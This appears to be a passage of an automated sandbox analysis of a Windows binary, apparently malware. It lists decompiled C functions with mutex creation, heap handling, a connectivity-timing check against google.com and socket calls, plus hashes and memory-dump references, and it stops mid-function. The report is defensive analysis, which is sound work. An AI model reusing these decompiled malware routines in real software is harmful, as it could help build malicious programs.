CreateMutexW.KERNEL32(0042E930,00000001,00000000,?,00000102,00000002,?,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041CD41
GetLastError.KERNEL32(?,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041CD4D
CloseHandle.KERNEL32(00000000,?,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041CD5B

Strings

pB, xrefs: 0041CD2B

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorFromHandleLastMutexString
String ID: pB
API String ID: 2863246993-3059159000
Opcode ID: 205a08c1149a270bb5d32c2752b16fce8942d3538c232e0b5f4ba3358f80894a
Instruction ID: da45fb755a0463556b21fe0e782765b9ee616ee5c9b102e9b867d3a0624d6e0e
Opcode Fuzzy Hash: 205a08c1149a270bb5d32c2752b16fce8942d3538c232e0b5f4ba3358f80894a
Instruction Fuzzy Hash: BE11827164835067D330E760DD82FDF73A99F84700F40493EF64996191D778A984CADA

Uniqueness

Uniqueness Score: -1.00%

Function 00413650, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413650(intOrPtr _a4) {
				long _v4;
				intOrPtr _v8;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				long _v28;
				char* _v32;
				void* _v36;
				intOrPtr _v40;
				long _v44;
				char _v48;
				void* _t21;
				long _t25;
				void* _t28;

				_v48 = 0x101;
				_v44 = 0;
				_v40 = _a4;
				_v36 = E00413580();
				_v32 = "http://www.google.com/webhp";
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0x80000;
				_v4 = 0;
				_t25 = GetTickCount();
				if(E004133B0( &_v48, 0) == 0) {
					_t28 = 0;
				} else {
					_t28 = GetTickCount() - _t25;
				}
				_t21 = _v36;
				if(_t21 != 0) {
					HeapFree( *0x42e6d4, 0, _t21);
				}
				return _t28;
			}

0x0041365c
0x00413663
0x00413667
0x00413676
0x0041367a
0x00413682
0x00413686
0x0041368a
0x0041368e
0x00413692
0x00413696
0x0041369e
0x004136a4
0x004136b2
0x004136bc
0x004136b4
0x004136b8
0x004136b8
0x004136be
0x004136c4
0x004136cf
0x004136cf
0x004136dd

APIs

Part of subcall function 00413580: LoadLibraryA.KERNEL32(urlmon.dll,?,?), ref: 0041358F
Part of subcall function 00413580: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 004135A5
Part of subcall function 00413580: FreeLibrary.KERNEL32(00000000), ref: 00413605

GetTickCount.KERNEL32 ref: 004136A2

Part of subcall function 004133B0: WaitForSingleObject.KERNEL32(?,?), ref: 00413408
Part of subcall function 004133B0: InternetCloseHandle.WININET(00000000), ref: 004134B9
Part of subcall function 004133B0: InternetQueryOptionA.WININET(00000000,00000015,?,?), ref: 004134DC
Part of subcall function 004133B0: InternetCloseHandle.WININET(00000000), ref: 004134EB

GetTickCount.KERNEL32 ref: 004136B4
HeapFree.KERNEL32(?,00000000,?,00000000), ref: 004136CF

Strings

http://www.google.com/webhp, xrefs: 0041367A

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseCountFreeHandleLibraryTick$AddressHeapLoadObjectOptionProcQuerySingleWait
String ID: http://www.google.com/webhp
API String ID: 1490942418-2670330958
Opcode ID: 83656254e56a2ae5c13a6328937a08eff427c3461c6d1dd9723235f4eb3558a8
Instruction ID: 1d759d173662f66218cf3a02b2666a09aebee79664cb88d164b8e872f0b1da39
Opcode Fuzzy Hash: 83656254e56a2ae5c13a6328937a08eff427c3461c6d1dd9723235f4eb3558a8
Instruction Fuzzy Hash: 970109B1615310ABC210DF2A994044BFBE8EFC8B55F50092FF994D3320D7B4CA498F9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A520, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0041A520(intOrPtr _a4) {
				char _v672;
				char _v800;
				void* __esi;
				long _t6;
				void* _t18;

				if( *0x42e788 == 0) {
					E0041D150( &_v800);
					E00416E10(0x42eb70,  &_v672,  *0x42e904, 0x42e788, 2);
				}
				_t18 = CreateMutexW(0x42e930, 0, 0x42e788);
				if(_t18 == 0) {
					L6:
					return 0;
				} else {
					_t6 = WaitForSingleObject(_t18, 0xffffffff);
					if(_t6 == 0 || _t6 == 0x80) {
						 *0x42e718 = _t18;
						E0041A440(_t18, _a4);
						return 1;
					} else {
						CloseHandle(_t18);
						goto L6;
					}
				}
			}

0x0041a52f
0x0041a535
0x0041a558
0x0041a558
0x0041a56f
0x0041a573
0x0041a590
0x0041a599
0x0041a575
0x0041a578
0x0041a580
0x0041a5a4
0x0041a5aa
0x0041a5b8
0x0041a589
0x0041a58a
0x00000000
0x0041a58a
0x0041a580

APIs

CreateMutexW.KERNEL32(0042E930,00000000,0042E788,?), ref: 0041A569
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041A578
CloseHandle.KERNEL32(00000000), ref: 0041A58A

Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6

Part of subcall function 0041A440: RegOpenKeyExW.ADVAPI32 ref: 0041A48E
Part of subcall function 0041A440: HeapFree.KERNEL32(?,00000000,?,00000000,?), ref: 0041A4FD

Strings

pB, xrefs: 0041A553

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateFreeFromHandleHeapMutexObjectOpenSingleStringWait
String ID: pB
API String ID: 260957474-3059159000
Opcode ID: 47bea97d8c28ff44688e19799dcfadacc82ffd6d7bf2d5edf17c678bca3d59a3
Instruction ID: 21e8035d942d172505ad67d78d4bb8485723199f702f5b4a63f2e89fc14ac132
Opcode Fuzzy Hash: 47bea97d8c28ff44688e19799dcfadacc82ffd6d7bf2d5edf17c678bca3d59a3
Instruction Fuzzy Hash: 5801493160122063E332E719EC45FDB33D45B54314FD0422BF454AA2E0DA3C5696C69F

Uniqueness

Uniqueness Score: -1.00%

Function 0041CDD0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041CDD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char _v672;
				char _v800;
				char _v904;
				short _v916;
				long _t15;
				void* _t22;

				E0041D150( &_v800);
				E00416E10(0x42eb70,  &_v672,  *0x42e904,  &_v904, _a8);
				_t22 = CreateMutexW(0x42e930, 0,  &_v916);
				if(_t22 == 0) {
					L4:
					return 0;
				} else {
					_t15 = WaitForSingleObject(_t22, 0xffffffff);
					if(_t15 == 0 || _t15 == 0x80) {
						return _t22;
					} else {
						CloseHandle(_t22);
						goto L4;
					}
				}
			}

0x0041cddb
0x0041ce07
0x0041ce1e
0x0041ce22
0x0041ce3f
0x0041ce48
0x0041ce24
0x0041ce27
0x0041ce2f
0x0041ce54
0x0041ce38
0x0041ce39
0x00000000
0x0041ce39
0x0041ce2f

APIs

Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6

CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
CloseHandle.KERNEL32(00000000), ref: 0041CE39

Strings

pB, xrefs: 0041CE02

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateFromHandleMutexObjectSingleStringWait
String ID: pB
API String ID: 3863295650-3059159000
Opcode ID: e5434edec459e2940484f313f1b045bd986653ee5b324b5188600413a5360b0a
Instruction ID: b09c9a47bd34e6ffa131b8f877b81c4577cb0a42370e09d22c8bb7e0dfb5de22
Opcode Fuzzy Hash: e5434edec459e2940484f313f1b045bd986653ee5b324b5188600413a5360b0a
Instruction Fuzzy Hash: A3F0C8752043115BD371E758ED84FEB779CAF94310F448A2EF899D2390EE389A4487AA

Uniqueness

Uniqueness Score: -1.00%

Function 00414D20, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(0000007F,00000001,00000006), ref: 00414D29
connect.WS2_32(00000000,?,-0000001D), ref: 00414D49
closesocket.WS2_32(00000000), ref: 00414D54

Strings

p0u, xrefs: 00414D54

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: closesocketconnectsocket
String ID: p0u
API String ID: 643388700-1742372003
Opcode ID: 40ef66999ff3c06ef88b84812362ce9e9ec01de5546ac9c5b6e2781f10787dc0
Instruction ID: 811b71dd85b763547402c5ab072f2fd0249334b37263b574dd705cbfcb3263ea
Opcode Fuzzy Hash: 40ef66999ff3c06ef88b84812362ce9e9ec01de5546ac9c5b6e2781f10787dc0
Instruction Fuzzy Hash: 6DE0123161153166D6242B39BD0AAEF2654DB81771B180359F533E91E1E768889185A4

Uniqueness

Uniqueness Score: -1.00%

Function 004082D0, Relevance: 6.4, APIs: 5, Instructions: 200
memoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004082D0(void* __edx, signed char* _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed char* _a20) {
				long _v0;
				char _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v20;
				void* __ebx;
				void* __esi;
				signed char _t47;
				signed int _t51;
				void* _t66;
				signed char _t71;
				signed char* _t73;
				intOrPtr _t75;
				signed char _t76;
				intOrPtr _t78;
				intOrPtr _t97;
				long _t99;
				signed char _t100;
				signed char _t102;
				signed int _t103;
				signed int _t104;
				void* _t106;
				void* _t107;

				_t73 = _a4;
				_t47 = _t73[8];
				_t76 =  *_t73;
				_t102 = __edx - _t47;
				if((_t76 & 0x00000004) == 0) {
					if((_t76 & 0x00000002) == 0) {
						if((_t76 & 0x00000001) == 0) {
							L38:
							return 1;
						} else {
							if(_a12 == 0) {
								goto L2;
							} else {
								_t51 = E00410840(_t102, _t47 + _a8);
								 *_a12 = _t51;
								if(_t51 == 0) {
									goto L8;
								} else {
									 *_a20 = _t102;
									_t73[0xc] = _t73[8] + _t102;
									goto L38;
								}
							}
						}
					} else {
						_t78 = _a8;
						_t97 = _t78 + __edx;
						_t107 = 0;
						_t103 = _t47 + _t78;
						_v8 = _t97;
						_a12 = 0;
						if(_t103 == _t97) {
							L29:
							_t104 = 0;
							goto L30;
						} else {
							while(1) {
								_t98 = _t97 - _t103;
								if(E00410890(_t103, _t97 - _t103, "\r\n", 2) == 0 && E00410890(_t103, _t98, "\n", 1) == 0) {
									goto L29;
								}
								_t103 = E00417D20(_t103,  &_v12, _t98,  &_v4);
								if(_t103 == 0) {
									L28:
									_t104 = _t103 | 0xffffffff;
									L30:
									if(_t107 != 0) {
										HeapFree( *0x42e6d4, 0, _t107);
									}
									return _t104;
								} else {
									if(_v12 == 0) {
										goto L29;
									} else {
										_t75 = _v4;
										if(_t75 == 0) {
											 *_a16 = _t107;
											_a4[0xc] = _t103 - _a8;
											 *_a20 = _a12;
											return 1;
										} else {
											_t99 = _t75 + _a12;
											if(_t99 != 0) {
												_t27 = _t99 + 4; // 0x4
												if(_t107 != 0) {
													_t66 = HeapReAlloc( *0x42e6d4, 8, _t107, ??);
												} else {
													_t66 = HeapAlloc( *0x42e6d4, 8, ??);
												}
												if(_t66 == 0) {
													goto L28;
												} else {
													_t107 = _t66;
													goto L26;
												}
											} else {
												if(_t107 != 0) {
													HeapFree( *0x42e6d4, _t99, _t107);
												}
												_t107 = 0;
												L26:
												E00410820(_a12 + _t107, _v12, _t75);
												_v0 = _t99;
												if(_t103 == _v20) {
													goto L29;
												} else {
													_t97 = _v8;
													continue;
												}
											}
										}
									}
								}
								goto L39;
							}
							goto L29;
						}
					}
				} else {
					_t100 = _t73[4];
					if(_t102 >= _t100) {
						_t106 = _t47 + _a8;
						if(_t100 != 0) {
							_t51 = HeapAlloc( *0x42e6d4, 0, _t100 + 4);
							if(_t51 != 0) {
								_t51 = E00410820(_t51, _t106, _t100);
							}
						} else {
							_t51 = 0;
						}
						 *_a16 = _t51;
						if(_t51 != 0) {
							_t71 = _t73[4];
							 *_a20 = _t71;
							_t73[0xc] = _t73[8] + _t71;
							return 1;
						} else {
							L8:
							return _t51 | 0xffffffff;
						}
					} else {
						L2:
						return 0;
					}
				}
				L39:
			}

0x004082d4
0x004082d8
0x004082db
0x004082e1
0x004082e7
0x00408363
0x004084aa
0x004084e0
0x004084e9
0x004084ac
0x004084b1
0x00000000
0x004084b7
0x004084bc
0x004084c5
0x004084c9
0x00000000
0x004084cf
0x004084d8
0x004084da
0x00000000
0x004084da
0x004084c9
0x004084b1
0x00408369
0x00408369
0x0040836d
0x00408370
0x00408372
0x00408375
0x00408379
0x0040837f
0x0040845c
0x0040845c
0x00000000
0x00408385
0x00408385
0x0040838c
0x00408397
0x00000000
0x00000000
0x004083c1
0x004083c5
0x00408457
0x00408457
0x0040845e
0x00408460
0x0040846b
0x0040846b
0x0040847a
0x004083cb
0x004083d0
0x00000000
0x004083d6
0x004083d6
0x004083dc
0x0040848d
0x00408494
0x00408499
0x004084a4
0x004083e2
0x004083e6
0x004083eb
0x00408404
0x0040840a
0x00408426
0x0040840c
0x00408415
0x00408415
0x0040842e
0x00000000
0x00408430
0x00408430
0x00000000
0x00408430
0x004083ed
0x004083ef
0x004083fa
0x004083fa
0x00408400
0x00408432
0x0040843f
0x00408444
0x0040844c
0x00000000
0x0040844e
0x0040844e
0x00000000
0x0040844e
0x0040844c
0x004083eb
0x004083dc
0x004083d0
0x00000000
0x004083c5
0x00000000
0x00408385
0x0040837f
0x004082e9
0x004082e9
0x004082ee
0x00408300
0x00408305
0x00408317
0x0040831f
0x00408324
0x00408324
0x00408307
0x00408307
0x00408307
0x0040832d
0x00408331
0x00408340
0x0040834f
0x00408351
0x0040835d
0x00408336
0x00408336
0x0040833d
0x0040833d
0x004082f3
0x004082f3
0x004082f9
0x004082f9
0x004082ee
0x00000000

APIs

HeapFree.KERNEL32(?,0040170C,00000000,00000000,0040170C,0040170C,00401710,00000001,0040170C,0040170C,0040170C,00000002,?,00000000,0040170C), ref: 004083FA
HeapAlloc.KERNEL32(?,00000008,00000004,0040170C,?,00000000,0040170C,00000002), ref: 00408415
HeapFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?), ref: 0040846B

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$Alloc
String ID:
API String ID: 3901518246-0
Opcode ID: b723e2d73e587895986796b93e8f3fd342f11eb6472c05b44a337394c8ee01f3
Instruction ID: 25cb61b662c1f0074a50a3d1505533385f21abfcb16a16ac66e99946e2a97e43
Opcode Fuzzy Hash: b723e2d73e587895986796b93e8f3fd342f11eb6472c05b44a337394c8ee01f3
Instruction Fuzzy Hash: 0151D3322043058BC710DF59E980B67B7A4EBC4B54F04453EFD84AB391DB79E946CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E660, Relevance: 6.4, APIs: 5, Instructions: 155
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E660(intOrPtr* __ecx, intOrPtr* _a4) {
				char _v656;
				void* _v660;
				intOrPtr _v664;
				long _v668;
				void* _v672;
				intOrPtr _v676;
				long _v680;
				void* __esi;
				signed int _t41;
				void* _t44;
				intOrPtr _t47;
				signed int _t48;
				void* _t50;
				void* _t63;
				void* _t64;
				intOrPtr _t68;
				long _t70;
				void* _t77;
				long _t84;
				signed int _t87;
				long _t90;
				long _t92;
				WCHAR* _t93;
				long _t96;

				_t41 = 0;
				_v680 = 0;
				if(__ecx != 0 &&  *__ecx != 0) {
					do {
						_t41 = _t41 + 1;
					} while ( *((short*)(__ecx + _t41 * 2)) != 0);
				}
				_t84 = E00411600(_t41,  &_v672);
				_v672 = _t84;
				if(_t84 != 0xffffffff) {
					if(_t84 == 0) {
						L33:
						_t77 = _v672;
					} else {
						_t77 = _v672;
						_t47 = 0;
						_v676 = 1;
						_v664 = 0;
						do {
							if( *((intOrPtr*)(_t47 + _t77)) == 0) {
								goto L30;
							} else {
								_t70 =  *((intOrPtr*)(_t47 + _t77));
								if( *_t70 == 0) {
									goto L30;
								} else {
									_t48 = 0;
									if(_t70 != 0 &&  *_t70 != 0) {
										do {
											_t48 = _t48 + 1;
										} while ( *((short*)(_t70 + _t48 * 2)) != 0);
									}
									_t96 = E004117A0(_t48, _t70,  &_v660);
									if(_t96 == 0xffffffff) {
										_v680 = 0xc5;
										goto L33;
									} else {
										_t64 = _v660;
										if(_t96 != 0) {
											_t87 = 0;
											while(1) {
												_t93 =  &_v656;
												E00424100( *((intOrPtr*)(0x403198 + _t87 * 8)), _t93);
												if(lstrcmpiW( *_t64, _t93) == 0) {
													break;
												}
												_t87 = _t87 + 1;
												if(_t87 < 0x19) {
													continue;
												} else {
												}
												L20:
												_t84 = _v668;
												if(_t87 == 0x19) {
													_v680 = 0xca;
													 *_a4 = _v676;
												}
												goto L22;
											}
											if( *((intOrPtr*)( *((intOrPtr*)(0x40319c + _t87 * 8))))() == 0) {
												_v680 = 0xc9;
												 *_a4 = _v676;
											}
											goto L20;
										}
										L22:
										_t92 = _t96;
										if(_t64 != 0 && _t96 != 0) {
											do {
												_t50 =  *(_t64 + _t92 * 4 - 4);
												_t92 = _t92 - 1;
												if(_t50 != 0) {
													HeapFree( *0x42e6d4, 0, _t50);
												}
											} while (_t92 != 0);
											HeapFree( *0x42e6d4, _t92, _t64);
										}
										if(_v680 != 0) {
											goto L33;
										} else {
											_t77 = _v672;
											_t47 = _v664;
											goto L30;
										}
									}
								}
							}
							goto L34;
							L30:
							_t68 = _v676 + 1;
							_v676 = _t68;
							_t47 = _t47 + 4;
							_v664 = _t47;
						} while (_t68 - 1 < _t84);
					}
					L34:
					_t90 = _t84;
					if(_t77 != 0 && _t84 != 0) {
						_t63 = _t77;
						do {
							_t44 =  *(_t63 + _t90 * 4 - 4);
							_t90 = _t90 - 1;
							if(_t44 != 0) {
								HeapFree( *0x42e6d4, 0, _t44);
							}
						} while (_t90 != 0);
						if(_t63 != 0) {
							HeapFree( *0x42e6d4, _t90, _t63);
						}
					}
					return _v680;
				} else {
					return 0xc5;
				}
			}

0x0040e666
0x0040e668
0x0040e671
0x0040e678
0x0040e678
0x0040e679
0x0040e678
0x0040e68b
0x0040e68d
0x0040e694
0x0040e6aa
0x0040e7e5
0x0040e7e5
0x0040e6b0
0x0040e6b0
0x0040e6b4
0x0040e6b6
0x0040e6be
0x0040e6c2
0x0040e6c6
0x00000000
0x0040e6cc
0x0040e6cc
0x0040e6d3
0x00000000
0x0040e6d9
0x0040e6d9
0x0040e6dd
0x0040e6e4
0x0040e6e4
0x0040e6e5
0x0040e6e4
0x0040e6f6
0x0040e6fb
0x0040e7dd
0x00000000
0x0040e701
0x0040e701
0x0040e707
0x0040e709
0x0040e710
0x0040e718
0x0040e71c
0x0040e72f
0x00000000
0x00000000
0x0040e731
0x0040e735
0x00000000
0x00000000
0x0040e737
0x0040e75f
0x0040e762
0x0040e766
0x0040e773
0x0040e77b
0x0040e77b
0x00000000
0x0040e766
0x0040e748
0x0040e755
0x0040e75d
0x0040e75d
0x00000000
0x0040e748
0x0040e77d
0x0040e77d
0x0040e781
0x0040e787
0x0040e787
0x0040e78b
0x0040e78e
0x0040e79a
0x0040e79a
0x0040e7a0
0x0040e7ac
0x0040e7ac
0x0040e7b8
0x00000000
0x0040e7ba
0x0040e7ba
0x0040e7be
0x00000000
0x0040e7be
0x0040e7b8
0x0040e6fb
0x0040e6d3
0x00000000
0x0040e7c2
0x0040e7c6
0x0040e7c7
0x0040e7cb
0x0040e7cf
0x0040e7d3
0x0040e7db
0x0040e7e9
0x0040e7e9
0x0040e7ed
0x0040e7f9
0x0040e800
0x0040e800
0x0040e804
0x0040e807
0x0040e813
0x0040e813
0x0040e815
0x0040e81b
0x0040e826
0x0040e826
0x0040e81b
0x0040e837
0x0040e696
0x0040e6a2
0x0040e6a2

APIs

lstrcmpiW.KERNEL32(?,?,?), ref: 0040E727
HeapFree.KERNEL32(?,00000000,?,?), ref: 0040E79A
HeapFree.KERNEL32(?,-00000001,?,?), ref: 0040E7AC

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$lstrcmpi
String ID:
API String ID: 3326462632-0
Opcode ID: 15dc93a65391c69ef824de6cfa5b8aac3f12796ca47a33f55102dfe0b85f9a1f
Instruction ID: 3f5485790c647a7a25097ddec1ed5246a78e667151a93702dfec6935f19d51d0
Opcode Fuzzy Hash: 15dc93a65391c69ef824de6cfa5b8aac3f12796ca47a33f55102dfe0b85f9a1f
Instruction Fuzzy Hash: A351DF756043018BD724EF26E944A2B73A5EBD4304F504E3EE890AB3E0DB79DC56C79A

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD49, Relevance: 6.4, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FD49(int __eax, void* __ecx, void* __edi, char _a8, char _a426, char _a446, char _a456, char _a466, char _a476) {
				int _t35;
				signed int _t36;
				int _t37;
				signed int _t38;
				int _t39;
				signed int _t40;
				int _t41;
				signed int _t42;
				int _t43;
				signed int _t44;
				void* _t58;
				short* _t59;
				short* _t60;
				short* _t61;
				short* _t62;
				short* _t63;
				void* _t66;

				_t58 = __edi;
				_t35 = __eax;
				do {
					_t35 = _t35 + 1;
				} while ( *((intOrPtr*)(_t66 + _t35 + 0x1aa)) != __ecx);
				_t36 = MultiByteToWideChar(0, 0,  &_a426, _t35, _t59, 0x104);
				if(_t36 >= 0x104) {
					_t36 = 0;
				}
				_t59[_t36] = 0;
				_t37 = 0;
				_t60 = _t58 + 0x5e0;
				if(_a446 != 0) {
					do {
						_t37 = _t37 + 1;
					} while ( *((intOrPtr*)(_t66 + _t37 + 0x1be)) != 0);
				}
				_t38 = MultiByteToWideChar(0, 0,  &_a446, _t37, _t60, 0x104);
				if(_t38 >= 0x104) {
					_t38 = 0;
				}
				_t60[_t38] = 0;
				_t39 = 0;
				_t61 = _t58 + 0x7e8;
				if(_a456 != 0) {
					do {
						_t39 = _t39 + 1;
					} while ( *((intOrPtr*)(_t66 + _t39 + 0x1c8)) != 0);
				}
				_t40 = MultiByteToWideChar(0, 0,  &_a456, _t39, _t61, 0xa);
				if(_t40 >= 0xa) {
					_t40 = 0;
				}
				_t61[_t40] = 0;
				_t41 = 0;
				_t62 = _t58 + 0x9f0;
				if(_a466 != 0) {
					do {
						_t41 = _t41 + 1;
					} while ( *((intOrPtr*)(_t66 + _t41 + 0x1d2)) != 0);
				}
				_t42 = MultiByteToWideChar(0, 0,  &_a466, _t41, _t62, 0xa);
				if(_t42 >= 0xa) {
					_t42 = 0;
				}
				_t62[_t42] = 0;
				_t43 = 0;
				_t63 = _t58 + 0xbf8;
				if(_a476 != 0) {
					do {
						_t43 = _t43 + 1;
					} while ( *((intOrPtr*)(_t66 + _t43 + 0x1dc)) != 0);
				}
				_t44 = MultiByteToWideChar(0, 0,  &_a476, _t43, _t63, 0xa);
				if(_t44 >= 0xa) {
					_t44 = 0;
				}
				_t63[_t44] = 0;
				return E00410870(_t44,  &_a8, 0, 0x1e6);
			}

0x0040fd49
0x0040fd49
0x0040fd50
0x0040fd50
0x0040fd51
0x0040fd6d
0x0040fd74
0x0040fd76
0x0040fd76
0x0040fd7a
0x0040fd7e
0x0040fd80
0x0040fd8d
0x0040fd90
0x0040fd90
0x0040fd91
0x0040fd90
0x0040fdad
0x0040fdb4
0x0040fdb6
0x0040fdb6
0x0040fdba
0x0040fdbe
0x0040fdc0
0x0040fdcd
0x0040fdd0
0x0040fdd0
0x0040fdd1
0x0040fdd0
0x0040fdea
0x0040fdef
0x0040fdf1
0x0040fdf1
0x0040fdf5
0x0040fdf9
0x0040fdfb
0x0040fe08
0x0040fe10
0x0040fe10
0x0040fe11
0x0040fe10
0x0040fe2a
0x0040fe2f
0x0040fe31
0x0040fe31
0x0040fe35
0x0040fe39
0x0040fe3b
0x0040fe48
0x0040fe50
0x0040fe50
0x0040fe51
0x0040fe50
0x0040fe6a
0x0040fe70
0x0040fe72
0x0040fe72
0x0040fe81
0x0040fe91

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FD6D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FDAD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FDEA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FE2A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FE6A

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 5af15b4eeee7456e3b976f572898f0f1354b044f17e90bcee156acfcc0eae465
Instruction ID: 2d295aa477f3407619f161b140afc71f17e2f3b83b99d9987b7ebe1e66ae18b4
Opcode Fuzzy Hash: 5af15b4eeee7456e3b976f572898f0f1354b044f17e90bcee156acfcc0eae465
Instruction Fuzzy Hash: DD3135726493803AE335D7308C45FEBB6A5EF81704F004D3EE68BEB0D2DA756158839A

Uniqueness

Uniqueness Score: -1.00%

Function 00407480, Relevance: 6.3, APIs: 5, Instructions: 87
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407480(signed int __eax) {
				void* __esi;
				void* _t18;
				void* _t21;
				void* _t22;
				signed int _t31;
				signed int _t33;
				long _t41;
				void* _t42;
				long _t45;
				long* _t49;
				void* _t50;

				_t41 =  *0x42d3e0; // 0x0
				_t31 = __eax * 8 - __eax;
				_t18 =  *(_t41 + 4 + _t31 * 8);
				_t49 = _t41 + _t31 * 8;
				 *_t49 = 0;
				if(_t18 != 0) {
					HeapFree( *0x42e6d4, 0, _t18);
				}
				E00425CF0(_t49[4], _t49[3]);
				_t21 = _t49[5];
				if(_t21 != 0) {
					HeapFree( *0x42e6d4, 0, _t21);
				}
				_t22 = _t49[7];
				if(_t22 != 0) {
					_t22 = HeapFree( *0x42e6d4, 0, _t22);
				}
				_t50 = _t49[0xb];
				if(_t50 != 0) {
					_t22 = HeapFree( *0x42e6d4, 0, _t50);
				}
				_t33 =  *0x42d3e4; // 0x0
				_t45 = _t33;
				if(_t33 == 0) {
					L18:
					return _t22;
				} else {
					_t42 =  *0x42d3e0; // 0x0
					_t14 = (_t33 * 8 - _t33) * 8; // -56
					_t22 = _t42 + _t14 - 0x38;
					while( *_t22 == 0) {
						_t22 = _t22 - 0x38;
						_t45 = _t45 - 1;
						if(_t45 != 0) {
							continue;
						}
						break;
					}
					if(_t45 == _t33) {
						goto L18;
					} else {
						if(_t45 != 0) {
